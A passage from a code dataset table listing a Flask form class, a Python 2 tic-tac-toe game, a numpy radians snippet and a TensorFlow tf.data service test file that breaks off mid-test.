index | blob_id | code |
|---|---|---|
999,300 | c85f683bc8894598ee5c09e9e021fecbbe5706c4 | from flask_wtf import Form
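# note: flask_wtf.Form is the pre-0.13 name of what later became FlaskForm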
from wtforms import StringField
class Director(Form):
name = StringField('Name')
|
999,301 | 3f466a82a3d58c6f9f418bc7cee66acb81142253 | from fn import *
from fn2 import *
a=['1','2','3'] #Row 1
b=['4','5','6'] #Row 2
c=['7','8','9'] #Row 3
i=0
print a,'\n',b,'\n',c,'\n'
chance=input("enter 0 for first chance else press anything ")
if chance!=0:
i=1
chance=0
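# fallback move order (0-indexed cells): centre 4 first, then corners 0,2,6,8, then edges 1,3,5,7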
priority=[4,0,2,6,8,1,3,5,7]
while True:
if i%2==0:
print "player's turn"
x=input("enter positon ")
if x not in range(1,10):
print "invalid input"
continue
if x<=3:
if a[x-1]=='x' or a[x-1]=='o':
print "invalid input"
continue
a[x-1]='x'
elif x<=6:
if b[x-4]=='x' or b[x-4]=='o':
print "invalid input"
continue
b[x-4]='x'
elif x<=9:
if c[x-7]=='x' or c[x-7]=='o':
print "invalid input"
continue
c[x-7]='x'
print a,'\n',b,'\n',c,'\n'
i+=1
chance+=1
if check_c(a,b,c) or check_r(a,b,c) or check_d(a,b,c): #checking for winner
break
else:
print "cumputer's turn\n"
p=check_put_comp_r(a,b,c)
q=check_put_comp_c(a,b,c)
r=check_put_comp_d(a,b,c)
t=check_put_user_r(a,b,c)
u=check_put_user_c(a,b,c)
v=check_put_user_d(a,b,c)
s=check_opposite_corner(a,b,c)
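        # preference order: complete a computer row/column/diagonal first, then block the user's, then take an opposite corner, else fall back to the priority list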
if p!=-1:
if p<3:
a[p]='o'
elif p<6:
p-=3
b[p]='o'
else:
p-=6
c[p]='o'
elif q!=-1:
if q<3:
a[q]='o'
elif q<6:
q-=3
b[q]='o'
else:
q-=6
c[q]='o'
elif r!=-1:
if r<3:
a[r]='o'
elif r<6:
r-=3
b[r]='o'
else:
r-=6
c[r]='o'
elif t!=-1:
if t<3:
a[t]='o'
elif t<6:
t-=3
b[t]='o'
else:
t-=6
c[t]='o'
elif u!=-1:
if u<3:
a[u]='o'
elif u<6:
u-=3
b[u]='o'
else:
u-=6
c[u]='o'
elif v!=-1:
if v<3:
a[v]='o'
elif v<6:
v-=3
b[v]='o'
else:
v-=6
c[v]='o'
elif s!=-1:
if s<3:
a[s]='o'
elif s<6:
s-=3
b[s]='o'
else:
s-=6
c[s]='o'
else:
check_put_priority(a,b,c,priority)
print a,'\n',b,'\n',c,'\n'
i+=1
chance+=1
if check_c(a,b,c) or check_r(a,b,c) or check_d(a,b,c): #checking for winner
break
if chance==9: #checking for draw
print "match is draw"
break
|
999,302 | ccc286ed03c4d36c884058a41ef2ddccb12ab542 | import matplotlib.pylab as plt
import numpy as np
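# twelve angles in 30-degree steps: 0, 30, ..., 330 degrees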
deg = np.arange(12.) * 30
b = np.radians(deg)
print(b) |
999,303 | d96ce47b9e3c06b3a69e5410e1b1168a8a70318c | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service ops."""
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import service_config_pb2
from tensorflow.python.data.experimental.kernel_tests.service import test_base as data_service_test_base
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.experimental.ops import grouping
from tensorflow.python.data.experimental.ops import testing
from tensorflow.python.data.experimental.service import server_lib
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variable_v1
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
TMP_WORK_DIR = data_service_test_base.TMP_WORK_DIR
NO_WORK_DIR = data_service_test_base.NO_WORK_DIR
class DataServiceOpsTest(
data_service_test_base.TestBase, parameterized.TestCase
):
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
data_service_test_base.all_cluster_configurations(),
)
)
def testDistributeBasic(self, work_dir, fault_tolerant_mode):
cluster = self.make_test_cluster(
num_workers=1,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode,
)
num_elements = 10
ds = self.make_distributed_range_dataset(num_elements, cluster)
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.default_test_combinations())
def testDistributeInvalidCompression(self):
cluster = self.make_test_cluster(num_workers=1)
with self.assertRaisesRegex(ValueError, "Invalid `compression` argument"):
self.make_distributed_range_dataset(10, cluster, compression="foo")
@combinations.generate(test_base.eager_only_combinations())
def testDistributeSparse(self):
cluster = self.make_test_cluster(num_workers=1)
element = sparse_tensor.SparseTensor(
indices=[[0]],
values=constant_op.constant([0], dtype=dtypes.int32),
dense_shape=[1],
)
ds = dataset_ops.Dataset.from_tensors(element)
ds = self.make_distributed_dataset(ds, cluster)
results = [sparse_ops.sparse_tensor_to_dense(elem) for elem in ds]
self.assertAllEqual(results, [[0]])
@combinations.generate(test_base.eager_only_combinations())
def testDistributeRagged(self):
cluster = self.make_test_cluster(num_workers=1)
ds = dataset_ops.Dataset.from_tensor_slices([1, 5, 3, 2, 8])
ds = ds.map(math_ops.range)
ds = ds.apply(batching.dense_to_ragged_batch(2))
ds = self.make_distributed_dataset(ds, cluster)
results = [elem.to_tensor() for elem in ds]
self.assertAllEqual(results[0], [[0, 0, 0, 0, 0], [0, 1, 2, 3, 4]])
self.assertAllEqual(results[1], [[0, 1, 2], [0, 1, 0]])
self.assertAllEqual(results[2], [[0, 1, 2, 3, 4, 5, 6, 7]])
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
init_source=["textfile", "keyvaluetensor", "dataset"]
),
)
)
def testDistributeLookupTable(self, init_source):
cluster = self.make_test_cluster(num_workers=1)
initializer = self.lookupTableInitializer(init_source, [10, 11])
table = lookup_ops.StaticHashTable(initializer, -1)
ds = dataset_ops.Dataset.range(3)
ds = ds.map(table.lookup)
ds = self.make_distributed_dataset(ds, cluster)
self.evaluate(lookup_ops.tables_initializer())
self.assertDatasetProduces(ds, [10, 11, -1], requires_initialization=True)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(value_rank=[0, 1]),
)
)
def testDistributeMutableHashTable(self, value_rank):
def value(v):
for _ in range(value_rank):
v = [v, v]
return v
v1 = value(10)
v2 = value(11)
default_value = value(-1)
cluster = self.make_test_cluster(num_workers=1)
table = lookup_ops.MutableHashTable(
dtypes.int64, dtypes.int64, default_value
)
self.evaluate(table.insert([0, 1], [v1, v2]))
ds = dataset_ops.Dataset.range(3)
ds = ds.map(table.lookup)
ds = self.make_distributed_dataset(ds, cluster)
self.assertDatasetProduces(
ds, [v1, v2, default_value], requires_initialization=True
)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(shuffle_seed=[None, 10]),
)
)
def testShuffleOrder(self, shuffle_seed):
random_seed.set_random_seed(None)
num_elements = 100
cluster = self.make_test_cluster(num_workers=2)
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.shuffle(num_elements, seed=shuffle_seed)
ds = self.make_distributed_dataset(ds, cluster)
output = self.getDatasetOutput(ds)
# The output will be two sequences of range(num_elements)
# non-deterministically interleaved together. If the orders of the elements
# were the same, first_order and second_order computed below will be equal.
first_order = {}
second_order = {}
for element in output:
if element in first_order:
second_order[element] = len(second_order)
else:
first_order[element] = len(first_order)
if shuffle_seed is None:
self.assertNotEqual(first_order, second_order)
else:
self.assertEqual(first_order, second_order)
@combinations.generate(test_base.default_test_combinations())
def testMultipleEpochs(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 3
ds = self.make_distributed_range_dataset(num_elements, cluster)
for _ in range(10):
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.default_test_combinations())
def testRepeatedDataset(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
num_repetitions = 5
ds = self.make_distributed_range_dataset(num_elements, cluster)
ds = ds.repeat(num_repetitions)
self.assertDatasetProduces(
ds, expected_output=num_repetitions * list(range(num_elements))
)
@combinations.generate(test_base.default_test_combinations())
def testConcurrentEpoch(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
num_datasets = 3
get_nexts = []
results = []
for _ in range(num_datasets):
ds = self.make_distributed_range_dataset(num_elements, cluster)
get_nexts.append(self.getNext(ds))
results.append([])
for _ in range(num_elements):
for dataset_ind in range(num_datasets):
result = self.evaluate(get_nexts[dataset_ind]())
results[dataset_ind].append(result)
for result in results:
self.assertEqual(list(range(num_elements)), result)
@combinations.generate(test_base.default_test_combinations())
def testMultiWorker(self):
num_workers = 3
cluster = self.make_test_cluster(num_workers=num_workers)
num_elements = 10
ds = self.make_distributed_range_dataset(num_elements, cluster)
self.assertDatasetProduces(
ds, num_workers * list(range(num_elements)), assert_items_equal=True
)
@combinations.generate(test_base.default_test_combinations())
def testFromGenerator(self):
cluster = self.make_test_cluster(num_workers=1)
def generator():
yield from range(10)
dataset = dataset_ops.Dataset.from_generator(
generator,
output_signature=tensor_spec.TensorSpec(shape=(), dtype=dtypes.int64),
)
dataset = dataset.apply(
data_service_ops.distribute(
data_service_ops.ShardingPolicy.OFF, cluster.dispatcher_address()
)
)
self.assertDatasetProduces(dataset, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testMaxOutstandingRequests(self):
num_workers = 3
cluster = self.make_test_cluster(num_workers=num_workers)
num_elements = 10
ds = self.make_distributed_range_dataset(
num_elements, cluster, max_outstanding_requests=1
)
self.assertDatasetProduces(
ds, num_workers * list(range(num_elements)), assert_items_equal=True
)
@combinations.generate(test_base.eager_only_combinations())
def testInsideFunction(self):
num_workers = 3
cluster = self.make_test_cluster(num_workers=num_workers)
num_elements = 10
@def_function.function
def f():
ds = self.make_distributed_range_dataset(num_elements, cluster)
result = tensor_array_ops.TensorArray(
dtypes.int64, size=num_workers * num_elements, dynamic_size=True
)
i = 0
for elem in ds:
result = result.write(i, elem)
i += 1
return result.stack()
result = list(f().numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), result)
@combinations.generate(test_base.default_test_combinations())
def testEmptyJobNameDistribute(self):
cluster = self.make_test_cluster(num_workers=1)
with self.assertRaisesRegex(ValueError, "`job_name` must not be empty"):
dataset_ops.Dataset.range(10).apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service=cluster.dispatcher.target,
job_name="",
)
)
@combinations.generate(test_base.default_test_combinations())
def testEmptyJobNameFromDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset_ops.Dataset.range(10)
)
with self.assertRaisesRegex(ValueError, "`job_name` must not be empty"):
data_service_ops.from_dataset_id(
dataset_id=dataset_id,
processing_mode="parallel_epochs",
service=cluster.dispatcher.target,
job_name="",
)
@combinations.generate(test_base.default_test_combinations())
def testNonStringJobNameDistribute(self):
cluster = self.make_test_cluster(num_workers=1)
with self.assertRaisesRegex(ValueError, "`job_name` must be a string"):
dataset_ops.Dataset.range(10).apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service=cluster.dispatcher.target,
job_name=constant_op.constant("foo"),
)
)
@combinations.generate(test_base.default_test_combinations())
def testNonStringJobNameFromDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset_ops.Dataset.range(10)
)
with self.assertRaisesRegex(ValueError, "`job_name` must be a string"):
data_service_ops.from_dataset_id(
dataset_id=dataset_id,
processing_mode="parallel_epochs",
service=cluster.dispatcher.target,
job_name=constant_op.constant("foo"),
)
@combinations.generate(test_base.default_test_combinations())
def testSharedJobName(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 1000
def make_ds():
return dataset_ops.Dataset.range(num_elements).shuffle(num_elements)
ds1 = self.make_distributed_dataset(make_ds(), cluster, job_name="job_name")
ds2 = self.make_distributed_dataset(make_ds(), cluster, job_name="job_name")
get_next_1 = self.getNext(ds1)
get_next_2 = self.getNext(ds2)
results = []
for _ in range(num_elements // 5):
results.append(self.evaluate(get_next_1()))
results.append(self.evaluate(get_next_2()))
results += self.getIteratorOutput(get_next_1)
results += self.getIteratorOutput(get_next_2)
self.assertCountEqual(list(range(num_elements)), results)
@combinations.generate(test_base.default_test_combinations())
def testDifferentJobNames(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds1 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name1"
)
ds2 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name2"
)
self.assertDatasetProduces(ds1, list(range(num_elements)))
self.assertDatasetProduces(ds2, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobNameMultiIteration(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds1 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name"
)
ds2 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name"
)
# iteration 1
self.assertDatasetProduces(ds1, list(range(num_elements)))
self.assertDatasetProduces(ds2, [])
# iteration 2
self.assertDatasetProduces(ds2, list(range(num_elements)))
self.assertDatasetProduces(ds1, [])
@combinations.generate(test_base.default_test_combinations())
def testSharedJobNameRepeat(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 100
num_repetitions = 3
ds1 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name"
)
ds1 = ds1.repeat(num_repetitions)
ds2 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name"
)
ds2 = ds2.repeat(num_repetitions)
results = []
get_next_1 = self.getNext(ds1)
get_next_2 = self.getNext(ds2)
for _ in range((num_elements * num_repetitions) // 5):
results.append(self.evaluate(get_next_1()))
for _ in range((num_elements * num_repetitions) // 5):
results.append(self.evaluate(get_next_2()))
results += self.getIteratorOutput(get_next_1)
results += self.getIteratorOutput(get_next_2)
self.assertCountEqual(num_repetitions * list(range(num_elements)), results)
@combinations.generate(test_base.default_test_combinations())
def testSharedJobNameRepeatEmptyJob(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds1 = ds.apply(
data_service_ops.distribute(
data_service_ops.ShardingPolicy.OFF,
cluster.dispatcher_address(),
job_name="shared_job"))
ds1 = ds1.repeat()
ds2 = ds.apply(
data_service_ops.distribute(
data_service_ops.ShardingPolicy.OFF,
cluster.dispatcher_address(),
job_name="shared_job"))
ds2 = ds2.repeat()
get_next_1 = self.getNext(ds1)
for i in list(range(num_elements)) * 3:
self.assertEqual(self.evaluate(get_next_1()), i)
# Verifies ds2 is non-empty.
get_next_2 = self.getNext(ds2)
for i in list(range(num_elements)) * 3:
_ = self.evaluate(get_next_2())
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobNameMultipleEpochs(self):
cluster = self.make_test_cluster(num_workers=1)
dataset = self.make_distributed_range_dataset(
10, cluster, job_name="job_name"
)
num_epochs = 5
for _ in range(num_epochs):
get_next = self.getNext(dataset)
self.assertEqual(self.getIteratorOutput(get_next), list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testStringDatasetId(self):
"""Tests passing a dataset ID of string Tensor."""
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(10)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset
)
dataset_id_str = (
dataset_id
if dataset_id.dtype == dtypes.string
else string_ops.as_string(dataset_id)
)
dataset = data_service_ops.from_dataset_id(
dataset_id=dataset_id_str,
element_spec=dataset.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
self.assertDatasetProduces(dataset, list(range(10)))
@combinations.generate(test_base.eager_only_combinations())
def testPyStringDatasetId(self):
"""Tests passing a dataset ID of Python string."""
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(10)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset
)
dataset_id_val = tensor_util.constant_value(dataset_id)
dataset_id_str = (
dataset_id_val.decode()
if isinstance(dataset_id_val, bytes)
else str(dataset_id_val)
)
dataset = data_service_ops.from_dataset_id(
dataset_id=dataset_id_str,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
self.assertDatasetProduces(dataset, list(range(10)))
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(job_name=[None, "test"]),
)
)
def testGcUnusedJob(self, job_name):
cluster = self.make_test_cluster(
num_workers=1, job_gc_check_interval_ms=50, job_gc_timeout_ms=20
)
num_elements = 100
ds = self.make_distributed_range_dataset(
num_elements, cluster, job_name=job_name
)
it = iter(ds)
self.assertEqual(next(it).numpy(), 0)
self.assertEqual(cluster.workers[0].num_tasks(), 1)
del it
while cluster.workers[0].num_tasks() > 0:
time.sleep(0.1)
@combinations.generate(test_base.eager_only_combinations())
def testDontGcUsedJob(self):
cluster = self.make_test_cluster(
num_workers=1, job_gc_check_interval_ms=50, job_gc_timeout_ms=20
)
num_elements = 1000
it1 = iter(
self.make_distributed_range_dataset(
num_elements, cluster, job_name="test1"
)
)
it2 = iter(
self.make_distributed_range_dataset(
num_elements, cluster, job_name="test2"
)
)
it3 = iter( # this iterator keeps the task alive. pylint: disable=unused-variable
self.make_distributed_range_dataset(
num_elements, cluster, job_name="test2"
)
)
self.assertEqual(cluster.workers[0].num_tasks(), 2)
del it1
del it2
# Check that only the first job is gced. The second job will not be gced
# because there is still an outstanding iterator for it.
while cluster.workers[0].num_tasks() > 1:
time.sleep(0.1)
self.assertEqual(cluster.workers[0].num_tasks(), 1)
@combinations.generate(test_base.eager_only_combinations())
def testDontGcJobsWithVisitationGuarantees(self):
cluster = self.make_test_cluster(
num_workers=1,
job_gc_check_interval_ms=50,
job_gc_timeout_ms=20,
)
num_elements = 1000
it1 = iter(
self.make_distributed_range_dataset(
num_elements,
cluster,
job_name="test1",
)
)
it2 = iter(
self.make_distributed_range_dataset(
num_elements,
cluster,
job_name="test2",
processing_mode=data_service_ops.ShardingPolicy.DYNAMIC,
)
)
self.assertEqual(cluster.workers[0].num_tasks(), 2)
del it1
del it2
# Check that only the first job is gced. The second job will not be gced
# because it has a sharding policy with visitation guarantees.
while cluster.workers[0].num_tasks() > 1:
time.sleep(0.1)
self.assertEqual(cluster.workers[0].num_tasks(), 1)
@combinations.generate(test_base.eager_only_combinations())
def testGcDynamicShardingJobIfRequested(self):
dispatcher = server_lib.DispatchServer(
service_config_pb2.DispatcherConfig(
protocol="grpc",
job_gc_check_interval_ms=50,
job_gc_timeout_ms=20,
gc_dynamic_sharding_jobs=True,
)
)
dispatcher_address = dispatcher.target.split("://")[1]
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=dispatcher_address, heartbeat_interval_ms=100
)
)
num_elements = 1000
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.apply(
data_service_ops._distribute(
processing_mode=data_service_ops.ShardingPolicy.DYNAMIC,
service=dispatcher.target,
)
)
it = iter(dataset)
self.assertEqual(worker._num_tasks(), 1)
del it
while worker._num_tasks() > 0:
time.sleep(0.1)
@combinations.generate(test_base.eager_only_combinations())
def testGcAndRecreate(self):
cluster = self.make_test_cluster(
num_workers=3, job_gc_check_interval_ms=50, job_gc_timeout_ms=20
)
num_elements = 1000
# Repeatedly create and garbage-collect the same job.
for _ in range(3):
ds = self.make_distributed_range_dataset(
num_elements, cluster, job_name="test"
)
it = iter(ds)
for _ in range(50):
next(it)
del it
# Wait for the task to be garbage-collected on all workers.
while cluster.num_tasks_on_workers() > 0:
time.sleep(0.1)
@combinations.generate(test_base.eager_only_combinations())
def testGcClient(self):
dispatcher = server_lib.DispatchServer(
service_config_pb2.DispatcherConfig(
protocol="grpc",
job_gc_check_interval_ms=50,
job_gc_timeout_ms=20,
client_timeout_ms=50,
)
)
dispatcher_address = dispatcher.target.split("://")[1]
_ = server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=dispatcher_address, heartbeat_interval_ms=100
)
)
num_elements = 1000
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.apply(
data_service_ops._distribute(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=dispatcher.target,
task_refresh_interval_hint_ms=10000,
)
)
get_next = self.getNext(dataset)
# The client does not heartbeat in 10 seconds. It will be garbage-collected.
with self.assertRaisesRegex(
errors.NotFoundError, "Unknown iteration client id"
):
self.evaluate(get_next())
time.sleep(3)
self.getIteratorOutput(get_next)
@combinations.generate(test_base.eager_only_combinations())
def testKeepClientAliveBeforeReading(self):
dispatcher = server_lib.DispatchServer(
service_config_pb2.DispatcherConfig(
protocol="grpc",
job_gc_check_interval_ms=50,
job_gc_timeout_ms=20,
client_timeout_ms=1000,
)
)
dispatcher_address = dispatcher.target.split("://")[1]
_ = server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=dispatcher_address, heartbeat_interval_ms=100
)
)
num_elements = 1000
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.apply(
data_service_ops._distribute(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=dispatcher.target,
task_refresh_interval_hint_ms=100,
)
)
get_next = self.getNext(dataset)
# The client regularly heartbeats in 100 milliseconds. It should not be
# garbage-collected even if it does not start reading in 3 seconds.
time.sleep(3)
self.assertEqual(
self.getIteratorOutput(get_next), list(range(num_elements))
)
@combinations.generate(test_base.default_test_combinations())
def testApplyDeterminismOption(self):
elements = list(range(10))
cluster = self.make_test_cluster(num_workers=1)
def dataset_fn(delay_ms):
@def_function.function
def interleave_fn(x):
ds = dataset_ops.Dataset.from_tensors(x)
if math_ops.equal(x, 0):
ds = ds.apply(testing.sleep(delay_ms * 1000))
else:
ds = ds.apply(testing.sleep(0))
return ds
ds = dataset_ops.Dataset.from_tensor_slices(elements)
ds = ds.interleave(interleave_fn, cycle_length=10, num_parallel_calls=10)
opts = options_lib.Options()
opts.deterministic = False
ds = ds.with_options(opts)
ds = self.make_distributed_dataset(ds, cluster)
return ds
self.checkDeterminism(
dataset_fn=dataset_fn,
expect_determinism=False,
expected_elements=elements,
)
def run_stateful(self, external_state_policy):
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements).map(
lambda _: random_ops.random_uniform(())
)
options = options_lib.Options()
options.experimental_external_state_policy = external_state_policy
ds = ds.with_options(options)
cluster = self.make_test_cluster(num_workers=3)
ds = self.make_distributed_dataset(ds, cluster)
self.getDatasetOutput(ds)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
external_state_policy=[
options_lib.ExternalStatePolicy.IGNORE,
options_lib.ExternalStatePolicy.WARN,
]
),
)
)
def testStatefulNoError(self, external_state_policy):
self.run_stateful(external_state_policy)
@combinations.generate(test_base.default_test_combinations())
def testStatefulError(self):
with self.assertRaises(errors.FailedPreconditionError):
self.run_stateful(options_lib.ExternalStatePolicy.FAIL)
@combinations.generate(test_base.default_test_combinations())
def testDistributeFromInterleave(self):
cluster = self.make_test_cluster(num_workers=1)
ds = dataset_ops.Dataset.range(2)
def interleave_fn(x):
dataset = dataset_ops.Dataset.range(10 * x, 10 * x + 2)
dataset = self.make_distributed_dataset(dataset, cluster)
return dataset
ds = ds.interleave(interleave_fn, cycle_length=2)
self.assertDatasetProduces(ds, [0, 10, 1, 11])
@combinations.generate(test_base.default_test_combinations())
def testDistributeNonStringAddresses(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(ValueError, "`service` must be a string"):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs", service=1
)
)
@combinations.generate(test_base.default_test_combinations())
def testDistributeEmptyAddress(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesWithLiteralMatch(
ValueError, "`service` must not be empty"
):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs", service=""
)
)
@combinations.generate(test_base.default_test_combinations())
def testDistributeInvalidProtocol(self):
cluster = self.make_test_cluster(num_workers=1)
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(
errors.NotFoundError,
"No credentials factory has been registered for protocol grp",
):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service="grp://" + cluster.dispatcher_address(),
)
)
self.getDatasetOutput(ds)
@combinations.generate(test_base.eager_only_combinations())
def testDistributeInvalidProcessingMode(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(
ValueError,
(
"should be a `tf.data.experimental.service.ShardingPolicy`, "
'`"parallel_epochs"`, or '
"`\"distributed_epoch\"`. Got 'invalid'."
),
):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="invalid", service="grpc://localhost:5000"
)
)
@combinations.generate(test_base.default_test_combinations())
def testZipDifferentProcessingModesDatasets(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 100
ds1 = dataset_ops.Dataset.range(num_elements)
ds1 = self.make_distributed_dataset(
ds1, cluster, processing_mode="distributed_epoch"
)
ds2 = dataset_ops.Dataset.range(num_elements)
ds2 = self.make_distributed_dataset(
ds2, cluster, processing_mode="parallel_epochs"
)
ds = dataset_ops.Dataset.zip((ds1, ds2))
self.assertDatasetProduces(
ds,
list(zip(range(num_elements), range(num_elements))),
assert_items_equal=True,
)
@combinations.generate(test_base.default_test_combinations())
def testZipDifferentProcessingModesDatasetsSharedJobName(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 100
ds1 = dataset_ops.Dataset.range(num_elements)
ds1 = self.make_distributed_dataset(
ds1, cluster, processing_mode="distributed_epoch", job_name="job_name"
)
ds2 = dataset_ops.Dataset.range(num_elements)
ds2 = self.make_distributed_dataset(
ds2, cluster, processing_mode="parallel_epochs", job_name="job_name"
)
ds = dataset_ops.Dataset.zip((ds1, ds2))
with self.assertRaisesRegex(
errors.InvalidArgumentError, "but found an existing job with diff"
):
self.getDatasetOutput(ds)
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher_address(), ds
)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs",
cluster.dispatcher.target,
dataset_id,
ds.element_spec,
)
self.assertDatasetProduces(from_dataset_id_ds, list(range(num_elements)))
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetIdSharedJobs(self):
cluster = self.make_test_cluster(num_workers=2)
dataset_ids = ["dataset_1", "dataset_2"]
datasets = [
dataset_ops.Dataset.range(20, output_type=dtypes.int32),
dataset_ops.Dataset.from_tensor_slices(list(range(20, 40))),
]
for ds, dataset_id in zip(datasets, dataset_ids):
# Evaluate to ensure that in graph mode `register_dataset` is called
# before `from_dataset_id` below.
self.evaluate(
data_service_ops.register_dataset(
cluster.dispatcher_address(), ds, dataset_id=dataset_id
)
)
# Read from both jobs in parallel, with 2 consumers for each job.
data_service_datasets = []
for _ in range(2):
for dataset, dataset_id in zip(datasets, dataset_ids):
ds = data_service_ops.from_dataset_id(
"distributed_epoch",
cluster.dispatcher.target,
dataset_id,
dataset.element_spec,
job_name="shared_job",
)
data_service_datasets.append(ds)
ds = dataset_ops.Dataset.from_tensor_slices(data_service_datasets)
ds = ds.interleave(lambda x: x, cycle_length=len(data_service_datasets))
self.assertDatasetProduces(ds, list(range(40)), assert_items_equal=True)
@combinations.generate(test_base.default_test_combinations())
def testRegisteringDatasetAsTfFunction(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
register_func = def_function.function(data_service_ops.register_dataset)
dataset_id = register_func(
(
constant_op.constant("grpc"),
constant_op.constant(cluster.dispatcher_address()),
),
ds,
)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs",
cluster.dispatcher.target,
dataset_id,
ds.element_spec,
)
self.assertDatasetProduces(from_dataset_id_ds, list(range(num_elements)))
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetIdMultipleComponents(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds = dataset_ops.Dataset.zip({"a": (ds, ds), "b": ds})
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher_address(), ds
)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs",
cluster.dispatcher.target,
dataset_id,
ds.element_spec,
)
output = self.getDatasetOutput(from_dataset_id_ds)
for i in range(num_elements):
self.assertEqual(i, output[i]["a"][0])
self.assertEqual(i, output[i]["a"][1])
self.assertEqual(i, output[i]["b"])
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetIdWrongElementSpec(self):
cluster = self.make_test_cluster(num_workers=1)
